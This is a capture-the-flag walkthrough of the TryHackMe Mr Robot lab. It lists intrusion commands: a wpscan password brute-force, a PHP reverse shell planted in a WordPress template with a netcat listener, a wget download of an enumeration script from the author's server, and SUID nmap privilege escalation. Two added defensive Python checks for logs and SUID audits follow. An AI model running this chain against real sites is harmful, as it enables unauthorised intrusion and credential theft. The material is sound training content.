This is my walkthrough for Mr-Robot
TryHackMe is an online platform that teaches Cybersecurity through hands-on virtual labs for beginners and experts.
About Mr Robot machine
Mr Robot is a virtual machine meant for beginners/intermediate infosec users. The objective of this challenge is to find 3 hidden keys located on the machine and get a root shell.
nmap 10.10.104.75 -sCV -p-
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-13 10:34 WAT
Nmap scan report for 10.10.104.75
Host is up (0.18s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
The open ports I focused on enumerating:
Web server port 80
On visiting the web page I found a website with an animation displayed in reference to the Mr Robot TV series. The animation ends at a screen that resembles a Linux terminal with a blinking cursor.
The first thing I do when I'm enumerating a web page is to check robots.txt.
On checking the /robots.txt file, I found an interesting wordlist and a key file:
fsocity.dic and key-1-of-3.txt
Opening key-1-of-3.txt in the URL bar, I got my 1st key:
I downloaded the “fsocity.dic” wordlist file for later use.
The wordlist has about 858160 lines and some of the words are duplicated, so I sorted it and removed the duplicates (the output goes to a new file, since redirecting onto the input file would truncate it before sort reads it):
sort -u fsocity.dic > fsocity_sorted.dic
After looking around and not finding anything else useful on the site, I decided to use Gobuster to enumerate the web directories.
Web Directory Enumeration
gobuster -u http://10.10.104.75 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -f -s 302,307,204,301,403
Gobuster gave me more directories, and looking at the directory list shows that the website runs on WordPress.
I started enumerating the wp pages but could not find anything interesting, so I jumped to the login page.
I tried logging in with the default credentials admin:admin and admin:password, but the login attempts failed. After a long time enumerating usernames, I found Elliot to be a valid user (I got that from the Mr Robot television series character Elliot Alderson).
When I entered a wrong user, I got an invalid user and wrong password error.
When I entered elliot, I got a valid user but wrong password error, so the login page itself confirms which usernames exist.
Remember the wordlist I downloaded earlier: I used it to brute-force the password of the user elliot.
Bruteforcing user (elliot)
Using wpscan and the wordlist I found earlier, I got the login creds :
wpscan --url http://10.10.104.75/ -U elliot -P ~/Downloads/fsocity.dic
I was able to log into wp-admin using the creds I found.
Using the WordPress admin privilege that the user "elliot" has, we can get a reverse shell.
Steps for getting a reverse shell through WordPress:
- Go to Appearance > Editor > 404 Template and replace the PHP code with a PHP reverse shell. You can get it here: http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
- Edited the following lines of php-reverse-shell.php with my local IP and reverse shell port 443:
$ip = '127.0.0.1'; // CHANGE THIS
$port = 1234; // CHANGE THIS
- Updated (saved) the script.
- Started a netcat listener on my system on the same port I specified in the script, 443:
- nc -lvp 443
- Visited the "/404" error page to trigger the reverse shell.
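As an added example (not part of the original write-up), here is a small Python checker a defender could run over Apache access logs to spot the two things done above: a password brute-force against wp-login.php (the wpscan step) and a theme-editor write that plants a shell. The log lines are constructed, and the heuristic relies on default WordPress behaviour: a failed login re-renders wp-login.php with status 200, a successful one answers with a 302 redirect to wp-admin.

```python
import re
from collections import defaultdict

# Constructed Apache access-log sample (not from the original write-up): three failed
# wp-login.php POSTs (200), one success (302), a theme-editor write, then the 404 hit.
SAMPLE_LOG = """\
10.0.0.5 - - [13/May/2020:10:40:01 +0100] "POST /wp-login.php HTTP/1.1" 200 4521 "-" "WPScan v3.8"
10.0.0.5 - - [13/May/2020:10:40:01 +0100] "POST /wp-login.php HTTP/1.1" 200 4521 "-" "WPScan v3.8"
10.0.0.5 - - [13/May/2020:10:40:02 +0100] "POST /wp-login.php HTTP/1.1" 200 4521 "-" "WPScan v3.8"
10.0.0.5 - - [13/May/2020:10:40:02 +0100] "POST /wp-login.php HTTP/1.1" 302 0 "-" "WPScan v3.8"
10.0.0.5 - - [13/May/2020:10:41:10 +0100] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [13/May/2020:10:41:30 +0100] "GET /404 HTTP/1.1" 404 0 "-" "Mozilla/5.0"
192.168.1.9 - - [13/May/2020:10:42:00 +0100] "GET /robots.txt HTTP/1.1" 200 41 "-" "curl/7.68.0"
"""
# Combined-log-format fields we need: client IP, method, path and status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def analyse(log_text, threshold=3):
    """Per source IP: failed-login count vs threshold, whether a login succeeded
    after failures (a brute-force that worked), and theme-editor writes."""
    fails = defaultdict(int)
    success_after_fail = set()
    theme_edits = defaultdict(int)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we can parse; skip it
        ip, method, status = m["ip"], m["method"], int(m["status"])
        path = m["path"].split("?", 1)[0]
        if method == "POST" and path == "/wp-login.php":
            if status == 200:                      # WordPress re-renders the form on failure
                fails[ip] += 1
            elif status == 302 and fails.get(ip, 0):  # redirect to wp-admin = success
                success_after_fail.add(ip)
        elif method == "POST" and path == "/wp-admin/theme-editor.php":
            theme_edits[ip] += 1                   # a theme file was written from the dashboard
    return {
        ip: {
            "bruteforce": fails[ip] >= threshold,
            "login_after_failures": ip in success_after_fail,
            "theme_edits": theme_edits[ip],
        }
        for ip in set(fails) | set(theme_edits)
    }

if __name__ == "__main__":
    for ip, finding in analyse(SAMPLE_LOG).items():
        print(ip, finding)
```

Disabling the dashboard file editor (DISALLOW_FILE_EDIT in wp-config.php) removes the theme-editor path entirely; the log check still catches the login side.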
I got limited shell as Daemon:
Spawn a TTY Shell
I upgraded my shell to a TTY shell, which lets me interact with it properly:
python3 -c "import pty; pty.spawn('/bin/sh')"
The daemon shell does not have the privilege to access all directories and files, but it can navigate some of the file system. I moved to the /home/ directory and found a directory for the user robot. The robot directory has 2 files.
One is the 2nd key, the other file is an md5 password hash for the user robot.
Daemon does not have read permission for key-2-of-3.txt; I can only read the key as robot. However, I do have read permission for the password.raw-md5 file, so I cat the password file and got the MD5 hash of robot's password. I cracked it on https://crackstation.net/ and obtained the password for the user robot.
Using the password I obtained from the hash, I successfully logged in as robot and got the 2nd flag:
su robot, then enter the password
The first thing I do when enumerating a machine for a root shell is to check what I can run with sudo -l. No luck here: I can't run any sudo command.
Privilege Escalation Script
Steps I used for that:
- I cd into the directory where my lse.sh script is and run
python -m SimpleHTTPServer 8000 on my machine to start the Python web server.
- On the Mr Robot machine, I cd into the /tmp directory and run
wget http://<my-IP>:8000/lse.sh (my attacking machine's IP is redacted here)
chmod +x lse.sh
After enumerating with lse.sh, I found from the results that nmap has the SUID bit set on the machine, which is interesting.
Checking GTFOBins shows how to leverage nmap to get root.
I ran the commands and got a root shell.
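Added example (not from the write-up, lse.sh or GTFOBins): a Python audit a defender can schedule to catch the misconfiguration abused above, a copy of nmap carrying the SUID bit. The baseline set of expected SUID programs and the sample modes are my assumptions; tune the baseline to a freshly built image of your own.

```python
import os
import stat

# Assumed baseline of SUID programs normally present on a Debian/Ubuntu-style host;
# anything with the SUID bit outside this set is reported.
EXPECTED_SUID = {
    "/bin/mount", "/bin/ping", "/bin/su", "/bin/umount",
    "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/sudo",
}
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}   # pseudo-filesystems, not worth walking

def is_suid(mode):
    """True for a regular file whose mode carries the set-user-ID bit (04000).
    Directories with the bit set are ignored: it has no privilege meaning there."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)

def walk_modes(root="/"):
    """Yield (path, mode) for every file under root, without following symlinks
    and skipping directories we cannot read."""
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                yield path, os.lstat(path).st_mode
            except OSError:
                continue  # vanished or unreadable; move on

def unexpected_suid(entries, expected=EXPECTED_SUID):
    """Filter (path, mode) pairs down to SUID files outside the baseline.
    A setuid /usr/bin/nmap or /usr/local/bin/nmap shows up here."""
    return sorted(path for path, mode in entries
                  if is_suid(mode) and os.path.normpath(path) not in expected)

if __name__ == "__main__":
    for path in unexpected_suid(walk_modes("/")):
        print("unexpected SUID:", path)
```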
As root, I can move into any directory or run any command without restrictions.
I moved to the /root/ directory and obtained the 3rd key.
This is the end.
Thanks for reading this write-up. Stay tuned and follow me on Twitter to receive updates on more write-ups and thoughts on information security concepts.